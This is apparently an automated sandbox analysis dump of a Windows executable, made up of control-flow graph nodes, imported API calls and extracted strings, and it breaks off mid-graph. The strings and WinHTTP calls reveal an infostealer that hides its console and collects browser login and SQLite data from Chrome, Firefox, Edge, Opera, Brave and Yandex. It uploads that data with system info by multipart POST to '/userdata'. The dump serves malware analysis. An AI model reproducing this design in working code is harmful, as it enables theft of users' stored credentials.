memcpy 3507->3509 3508->3289 3509->3289 3511 7ff7cea946a2 3510->3511 3512 7ff7cea946c7 3510->3512 3606 7ff7cea9a0c0 3511->3606 3515 7ff7cea9a0c0 7 API calls 3512->3515 3514 7ff7cea946c2 3517 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3514->3517 3516 7ff7cea946ff GetLocaleInfoA 3515->3516 3518 7ff7cea947b0 3516->3518 3519 7ff7cea94728 3516->3519 3520 7ff7cea94797 3517->3520 3523 7ff7cea9a0c0 7 API calls 3518->3523 3521 7ff7cea9a0c0 7 API calls 3519->3521 3520->3298 3522 7ff7cea94748 3521->3522 3522->3514 3524 7ff7cea94780 3522->3524 3527 7ff7cea94a33 _invalid_parameter_noinfo_noreturn 3522->3527 3525 7ff7cea947e3 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3523->3525 3528 7ff7cea9b500 _Receive_impl free 3524->3528 3526 7ff7cea999f0 9 API calls 3525->3526 3529 7ff7cea9487e 3526->3529 3528->3514 3623 7ff7cea9b250 3529->3623 3532 7ff7cea999f0 9 API calls 3533 7ff7cea948a9 3532->3533 3534 7ff7cea9b250 9 API calls 3533->3534 3535 7ff7cea948c7 3534->3535 3536 7ff7cea999f0 9 API calls 3535->3536 3537 7ff7cea948d6 3536->3537 3538 7ff7cea94963 3537->3538 3539 7ff7cea996c0 8 API calls 3537->3539 3540 7ff7cea97c10 _Receive_impl 3 API calls 3538->3540 3539->3538 3541 7ff7cea9498c ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3540->3541 3541->3522 3542 7ff7cea949ac 3541->3542 3543 7ff7cea949dc 3542->3543 3544 7ff7cea949d5 _invalid_parameter_noinfo_noreturn 3542->3544 3545 7ff7cea9b500 _Receive_impl free 3543->3545 3544->3543 3545->3522 3638 7ff7cea96810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3546->3638 3548 7ff7cea935be 3549 7ff7cea999f0 9 API calls 3548->3549 3550 7ff7cea935cf ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G 3549->3550 3551 7ff7cea999f0 9 API calls 3550->3551 3552 7ff7cea935ec 3551->3552 3553 7ff7cea999f0 9 API calls 3552->3553 3554 7ff7cea935fc ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K 3553->3554 3555 7ff7cea999f0 9 API calls 3554->3555 3556 7ff7cea93618 3555->3556 3558 7ff7cea996c0 8 API calls 3556->3558 3559 7ff7cea936a6 3556->3559 3557 7ff7cea97c10 _Receive_impl 3 API calls 3560 7ff7cea936d8 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3557->3560 3558->3559 3559->3557 3561 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3560->3561 3562 7ff7cea936fe 3561->3562 3562->3308 3563->3317 3567 7ff7cea99a20 ?good@ios_base@std@ 3564->3567 3566 7ff7cea99a73 3568 7ff7cea99a89 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3566->3568 3573 7ff7cea99aa1 3566->3573 3567->3566 3567->3573 3568->3573 3570 7ff7cea99afd ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3574 7ff7cea99aab ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3570->3574 3575 7ff7cea99b1a 3570->3575 3571 7ff7cea95f94 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K 3571->3320 3572 7ff7cea99b8d ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3572->3571 3573->3570 3573->3574 3576 7ff7cea99ad5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3573->3576 3574->3571 3574->3572 3575->3574 3577 7ff7cea99b25 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3575->3577 3576->3573 3576->3574 3577->3574 3577->3575 3579 7ff7cea97c7f ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3578->3579 3581 7ff7cea97c29 3578->3581 3580 7ff7cea97cc0 _invalid_parameter_noinfo_noreturn 3579->3580 3581->3580 3582 7ff7cea9b500 _Receive_impl free 3581->3582 3582->3579 3584 7ff7cea996dd memcpy 3583->3584 3588 7ff7cea99707 3583->3588 3584->3322 3586 7ff7cea9980c 3639 7ff7cea91310 ?_Xlength_error@std@@YAXPEBD 3586->3639 3588->3586 3592 7ff7cea99761 3588->3592 3593 7ff7cea99799 3588->3593 3594 7ff7cea99753 3588->3594 3589 7ff7cea99811 3595 7ff7cea91270 Concurrency::cancel_current_task __std_exception_copy 3589->3595 3590 7ff7cea9b508 std::_Facet_Register 3 API calls 3590->3594 3591 7ff7cea997a1 memcpy 3599 7ff7cea997ef 3591->3599 3600 7ff7cea997c2 3591->3600 3592->3589 3592->3590 3598 7ff7cea9b508 std::_Facet_Register 3 API calls 3593->3598 3594->3591 3596 7ff7cea99805 _invalid_parameter_noinfo_noreturn 3594->3596 3597 7ff7cea99817 3595->3597 3596->3586 3598->3594 3599->3322 3600->3596 3601 7ff7cea997e7 3600->3601 3602 7ff7cea9b500 _Receive_impl free 3601->3602 3602->3599 3604 7ff7cea94a5d memset memset memset memset memset 3603->3604 3605 7ff7cea96810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3604->3605 3605->3465 3607 7ff7cea9a1b0 3606->3607 3608 7ff7cea9a0e6 3606->3608 3637 7ff7cea91310 ?_Xlength_error@std@@YAXPEBD 3607->3637 3609 7ff7cea9a0ec memcpy 3608->3609 3616 7ff7cea9a10b 3608->3616 3609->3514 3611 7ff7cea9a11c 3613 7ff7cea9b508 std::_Facet_Register 3 API calls 3611->3613 3612 7ff7cea9a1b5 3614 7ff7cea91270 Concurrency::cancel_current_task __std_exception_copy 3612->3614 3619 7ff7cea9a132 3613->3619 3620 7ff7cea9a1bb 3614->3620 3616->3611 3616->3612 3617 7ff7cea9a17c 3616->3617 3621 7ff7cea9a137 memcpy 3616->3621 3618 7ff7cea9b508 std::_Facet_Register 3 API calls 3617->3618 3618->3621 3619->3621 3622 7ff7cea9a175 _invalid_parameter_noinfo_noreturn 3619->3622 3621->3514 3622->3617 3626 7ff7cea9b286 ?good@ios_base@std@ 3623->3626 3625 7ff7cea9b2bf 3628 7ff7cea9b2d5 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3625->3628 3635 7ff7cea9b2ed 3625->3635 3626->3625 3626->3635 3627 7ff7cea9b347 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3631 7ff7cea9b337 3627->3631 3632 7ff7cea9b2f7 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3627->3632 3628->3635 3630 7ff7cea9b31b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3630->3631 3630->3635 3631->3632 3636 7ff7cea9b369 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3631->3636 3633 7ff7cea9b3d1 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3632->3633 3634 7ff7cea9489a 3632->3634 3633->3634 3634->3532 3635->3627 3635->3630 3635->3632 3636->3631 3636->3632 3638->3548 3680 7ff7cea9cfed _seh_filter_exe 3681 7ff7cea969e0 3682 7ff7cea96a03 3681->3682 3683 7ff7cea96a9f 3682->3683 3684 7ff7cea96a21 setvbuf 3682->3684 3686 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3683->3686 3684->3683 3685 7ff7cea96a2f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3684->3685 3685->3683 3687 7ff7cea96a51 _get_stream_buffer_pointers 3685->3687 3688 7ff7cea96ace 3686->3688 3687->3683 3884 7ff7cea96ae0 3885 7ff7cea96b16 3884->3885 3891 7ff7cea96b35 3884->3891 3886 7ff7cea988f0 10 API calls 3885->3886 3887 7ff7cea96b1b 3886->3887 3890 7ff7cea96b1f fsetpos 3887->3890 3887->3891 3888 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3889 7ff7cea96bab 3888->3889 3890->3891 3891->3888 3983 7ff7cea9b85c 3984 7ff7cea9b874 3983->3984 3985 7ff7cea9b87e 3983->3985 3986 7ff7cea9b500 _Receive_impl free 3984->3986 3986->3985 3987 7ff7cea9c65e ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA
              APIs
                • Part of subcall function 00007FF7CEA91520: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA9157F
                • Part of subcall function 00007FF7CEA91520: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CEA9159E
                • Part of subcall function 00007FF7CEA91520: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA915D2
                • Part of subcall function 00007FF7CEA91520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CEA91609
                • Part of subcall function 00007FF7CEA91520: isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CEA91648
                • Part of subcall function 00007FF7CEA91520: ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF7CEA9166D
                • Part of subcall function 00007FF7CEA91520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7CEA9169B
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA91C67
              • memcpy.VCRUNTIME140 ref: 00007FF7CEA91CAF
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA91DB1
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA91E02
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA91E53
              • WinHttpOpen.WINHTTP ref: 00007FF7CEA91E86
              • WinHttpConnect.WINHTTP ref: 00007FF7CEA91EC2
              • memcpy.VCRUNTIME140 ref: 00007FF7CEA9207E
              • memcpy.VCRUNTIME140 ref: 00007FF7CEA921A4
              • GetFileAttributesW.KERNELBASE ref: 00007FF7CEA92254
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CEA922A7
              • memcpy.VCRUNTIME140 ref: 00007FF7CEA924FF
              • memcmp.VCRUNTIME140 ref: 00007FF7CEA92597
              • memcpy.VCRUNTIME140 ref: 00007FF7CEA927C6
              • memcpy.VCRUNTIME140 ref: 00007FF7CEA92BF9
                • Part of subcall function 00007FF7CEA9A0C0: memcpy.VCRUNTIME140 ref: 00007FF7CEA9A0F8
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CEA9301F
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9302A
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93031
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93038
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9303F
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93046
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9304D
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93054
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9305B
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93062
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93069
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93070
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93077
              • WinHttpCloseHandle.WINHTTP ref: 00007FF7CEA93357
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9339F
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7CEA933C6
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CEA933D6
              • GetLastError.KERNEL32 ref: 00007FF7CEA933A6
                • Part of subcall function 00007FF7CEA999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99AE6
              • WinHttpCloseHandle.WINHTTP ref: 00007FF7CEA933E9
              • GetLastError.KERNEL32 ref: 00007FF7CEA933F1
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7CEA93411
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CEA93421
              • WinHttpCloseHandle.WINHTTP ref: 00007FF7CEA9342A
              • GetLastError.KERNEL32 ref: 00007FF7CEA93432
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9307E
                • Part of subcall function 00007FF7CEA999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A69
                • Part of subcall function 00007FF7CEA999F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A89
                • Part of subcall function 00007FF7CEA999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A99
                • Part of subcall function 00007FF7CEA999F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B7C
                • Part of subcall function 00007FF7CEA999F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B83
                • Part of subcall function 00007FF7CEA999F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B90
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93085
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9308C
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CEA923CE
                • Part of subcall function 00007FF7CEA9B508: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA9B538
                • Part of subcall function 00007FF7CEA9B508: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA9B53E
              • WinHttpOpenRequest.WINHTTP ref: 00007FF7CEA91F1F
                • Part of subcall function 00007FF7CEA9B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7CEA9107B), ref: 00007FF7CEA9B522
              • memcpy.VCRUNTIME140 ref: 00007FF7CEA930E8
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9313F
              • WinHttpSendRequest.WINHTTP ref: 00007FF7CEA9318B
              • WinHttpReceiveResponse.WINHTTP ref: 00007FF7CEA9319E
              • WinHttpQueryHeaders.WINHTTP ref: 00007FF7CEA931D5
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7CEA9324A
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CEA9325A
              • WinHttpCloseHandle.WINHTTP ref: 00007FF7CEA93263
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA932A2
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA932F0
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93338
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7CEA93452
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CEA93462
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93494
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA934DC
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA93519
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA9351F
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA93525
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA93537
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA9353D
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA93549
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@$Http$Concurrency::cancel_current_taskmemcpy$V01@@$CloseHandle$ErrorLastU?$char_traits@_W@std@@@std@@$?good@ios_base@std@@OpenRequest$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?setw@std@@?sputc@?$basic_streambuf@?uncaught_exception@std@@AttributesConnectD@std@@@1@_FileHeadersJ@1@_Osfx@?$basic_ostream@_QueryReceiveResponseSendSmanip@_U?$_V12@V21@@V?$basic_streambuf@Vios_base@1@isalnummallocmemcmp
              • String ID: $" }$", "ip": "$"; filename="login_data$--WebKitFormBoundary$.json"$.sqlite"$/userdata$?? ??????? ???????? ????? ?? ???????.$?? ??????? ????????? ??????. HTTP ?????? ???: $?????? ??????? ??????????. HTTP ?????? ???: $?????? ???????? ?????? WinHTTP: $?????? ???????? ???????: $?????? ???????? HTTP-???????: $?????? ?????????? ? ????????: $Content-Disposition: form-data; name="sysinfo"$Content-Type: application/json$Content-Type: application/x-sqlite3$Content-Type: multipart/form-data; boundary=WebKitFormBoundary$File is found: $File not found: $FileData is empty$POST$WinHTTP/1.0$brave$chrome$chromebeta$chromium$firefox$fo": "$msedge$name="$opera$operagx$yandex
              • API String ID: 3244378811-4092172495
              • Opcode ID: aca90b9fdd6baca4bd01d31155b6881f673c0c07d014879c02f9f5b82f59b01f
              • Instruction ID: 72430515eeef2344948f6122033cf66d29e25ac089a3cc8fb2c74d9003e4ba08
              • Opcode Fuzzy Hash: aca90b9fdd6baca4bd01d31155b6881f673c0c07d014879c02f9f5b82f59b01f
              • Instruction Fuzzy Hash: FFE2B662E1878289EB10AF25DC407FDA3A1EB457B4F905631DA6D27AD6DF3CE584C320

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 483 7ff7cea95d80-7ff7cea95e24 GetConsoleWindow ShowWindow call 7ff7cea99610 call 7ff7cea94a40 call 7ff7cea983c0 490 7ff7cea95e26-7ff7cea95e38 483->490 491 7ff7cea95e5b-7ff7cea95e92 call 7ff7cea99610 call 7ff7cea94640 call 7ff7cea983c0 483->491 493 7ff7cea95e56 call 7ff7cea9b500 490->493 494 7ff7cea95e3a-7ff7cea95e4d 490->494 502 7ff7cea95e94-7ff7cea95ea6 491->502 503 7ff7cea95ec9-7ff7cea95f00 call 7ff7cea99610 call 7ff7cea93560 call 7ff7cea983c0 491->503 493->491 494->493 497 7ff7cea95e4f-7ff7cea95e55 _invalid_parameter_noinfo_noreturn 494->497 497->493 504 7ff7cea95ec4 call 7ff7cea9b500 502->504 505 7ff7cea95ea8-7ff7cea95ebb 502->505 514 7ff7cea95f02-7ff7cea95f14 503->514 515 7ff7cea95f37-7ff7cea95fe7 call 7ff7cea99610 GlobalMemoryStatusEx memset call 7ff7cea96810 call 7ff7cea999f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff7cea999f0 503->515 504->503 505->504 507 7ff7cea95ebd-7ff7cea95ec3 _invalid_parameter_noinfo_noreturn 505->507 507->504 516 7ff7cea95f32 call 7ff7cea9b500 514->516 517 7ff7cea95f16-7ff7cea95f29 514->517 528 7ff7cea95fe9-7ff7cea95ff3 515->528 529 7ff7cea9600a-7ff7cea9600d 515->529 516->515 517->516 519 7ff7cea95f2b-7ff7cea95f31 _invalid_parameter_noinfo_noreturn 517->519 519->516 528->529 530 7ff7cea95ff5-7ff7cea96008 528->530 531 7ff7cea9600f-7ff7cea96019 529->531 532 7ff7cea96031-7ff7cea96035 529->532 533 7ff7cea96039-7ff7cea9603c 530->533 531->532 534 7ff7cea9601b-7ff7cea9602f 531->534 532->533 535 7ff7cea96049-7ff7cea960a8 call 7ff7cea97c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff7cea983c0 533->535 536 7ff7cea9603e-7ff7cea96048 call 7ff7cea996c0 533->536 534->533 543 7ff7cea960aa-7ff7cea960bc 535->543 544 7ff7cea960dc-7ff7cea96113 call 7ff7cea99610 call 7ff7cea93780 call 7ff7cea983c0 535->544 536->535 545 7ff7cea960d7 call 7ff7cea9b500 543->545 546 7ff7cea960be-7ff7cea960d1 543->546 563 7ff7cea96115-7ff7cea96127 544->563 564 7ff7cea9614a-7ff7cea96181 call 7ff7cea99610 call 7ff7cea93aa0 call 7ff7cea983c0 544->564 545->544 546->545 548 7ff7cea9676e-7ff7cea96774 _invalid_parameter_noinfo_noreturn 546->548 552 7ff7cea96775 call 7ff7cea9b500 548->552 556 7ff7cea9677a-7ff7cea96796 552->556 558 7ff7cea96798-7ff7cea967a9 556->558 559 7ff7cea967cc-7ff7cea967fd call 7ff7cea9b4e0 556->559 560 7ff7cea967c7 call 7ff7cea9b500 558->560 561 7ff7cea967ab-7ff7cea967be 558->561 560->559 561->560 565 7ff7cea967c0-7ff7cea967c6 _invalid_parameter_noinfo_noreturn 561->565 569 7ff7cea96145 call 7ff7cea9b500 563->569 570 7ff7cea96129-7ff7cea9613c 563->570 578 7ff7cea96183-7ff7cea96195 564->578 579 7ff7cea961b8-7ff7cea961da call 7ff7cea94e50 564->579 565->560 569->564 570->569 573 7ff7cea9613e-7ff7cea96144 _invalid_parameter_noinfo_noreturn 570->573 573->569 580 7ff7cea961b3 call 7ff7cea9b500 578->580 581 7ff7cea96197-7ff7cea961aa 578->581 586 7ff7cea961e0-7ff7cea9620d 579->586 587 7ff7cea967fe-7ff7cea96803 call 7ff7cea91310 579->587 580->579 581->580 583 7ff7cea961ac-7ff7cea961b2 _invalid_parameter_noinfo_noreturn 581->583 583->580 588 7ff7cea9620f-7ff7cea96219 586->588 589 7ff7cea96288-7ff7cea96315 memcpy call 7ff7cea99610 call 7ff7cea983c0 586->589 599 7ff7cea96804-7ff7cea96809 call 7ff7cea91270 587->599 592 7ff7cea9624b-7ff7cea9625e 588->592 593 7ff7cea9621b-7ff7cea96228 588->593 611 7ff7cea96317-7ff7cea96329 589->611 612 7ff7cea9634d-7ff7cea96355 589->612 597 7ff7cea96260-7ff7cea96262 592->597 598 7ff7cea96264-7ff7cea9626b 592->598 596 7ff7cea9622c-7ff7cea96237 call 7ff7cea9b508 593->596 613 7ff7cea9637f-7ff7cea96385 _invalid_parameter_noinfo_noreturn 596->613 614 7ff7cea9623d-7ff7cea96249 596->614 602 7ff7cea96284 597->602 603 7ff7cea9627c-7ff7cea96281 call 7ff7cea9b508 598->603 604 7ff7cea9626d-7ff7cea96274 598->604 602->589 603->602 604->599 608 7ff7cea9627a 604->608 608->596 616 7ff7cea96347-7ff7cea9634c call 7ff7cea9b500 611->616 617 7ff7cea9632b-7ff7cea9633e 611->617 618 7ff7cea96357-7ff7cea96368 612->618 619 7ff7cea9638b-7ff7cea963c2 call 7ff7cea99610 call 7ff7cea93cd0 call 7ff7cea983c0 612->619 620 7ff7cea96386 call 7ff7cea9b500 613->620 614->602 616->612 617->616 623 7ff7cea96340-7ff7cea96346 _invalid_parameter_noinfo_noreturn 617->623 618->620 625 7ff7cea9636a-7ff7cea9637d 618->625 632 7ff7cea963c4-7ff7cea963d6 619->632 633 7ff7cea963f9-7ff7cea96430 call 7ff7cea99610 call 7ff7cea93f60 call 7ff7cea983c0 619->633 620->619 623->616 625->613 625->620 634 7ff7cea963f4 call 7ff7cea9b500 632->634 635 7ff7cea963d8-7ff7cea963eb 632->635 644 7ff7cea96432-7ff7cea96444 633->644 645 7ff7cea96467-7ff7cea96488 call 7ff7cea94180 call 7ff7cea983c0 633->645 634->633 635->634 637 7ff7cea963ed-7ff7cea963f3 _invalid_parameter_noinfo_noreturn 635->637 637->634 646 7ff7cea96462 call 7ff7cea9b500 644->646 647 7ff7cea96446-7ff7cea96459 644->647 654 7ff7cea964bf-7ff7cea96555 memset call 7ff7cea96810 GetModuleFileNameA call 7ff7cea999f0 * 3 645->654 655 7ff7cea9648a-7ff7cea9649c 645->655 646->645 647->646 649 7ff7cea9645b-7ff7cea96461 _invalid_parameter_noinfo_noreturn 647->649 649->646 668 7ff7cea96557-7ff7cea96561 654->668 669 7ff7cea96578-7ff7cea9657b 654->669 657 7ff7cea964ba call 7ff7cea9b500 655->657 658 7ff7cea9649e-7ff7cea964b1 655->658 657->654 658->657 659 7ff7cea964b3-7ff7cea964b9 _invalid_parameter_noinfo_noreturn 658->659 659->657 668->669 670 7ff7cea96563-7ff7cea96576 668->670 671 7ff7cea9659f-7ff7cea965a3 669->671 672 7ff7cea9657d-7ff7cea96587 669->672 674 7ff7cea965a7-7ff7cea965aa 670->674 671->674 672->671 673 7ff7cea96589-7ff7cea9659d 672->673 673->674 675 7ff7cea965b7-7ff7cea9660f call 7ff7cea97c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff7cea983c0 674->675 676 7ff7cea965ac-7ff7cea965b6 call 7ff7cea996c0 674->676 683 7ff7cea96611-7ff7cea96623 675->683 684 7ff7cea96643-7ff7cea9667a call 7ff7cea99610 call 7ff7cea94390 call 7ff7cea983c0 675->684 676->675 686 7ff7cea96625-7ff7cea96638 683->686 687 7ff7cea9663e call 7ff7cea9b500 683->687 699 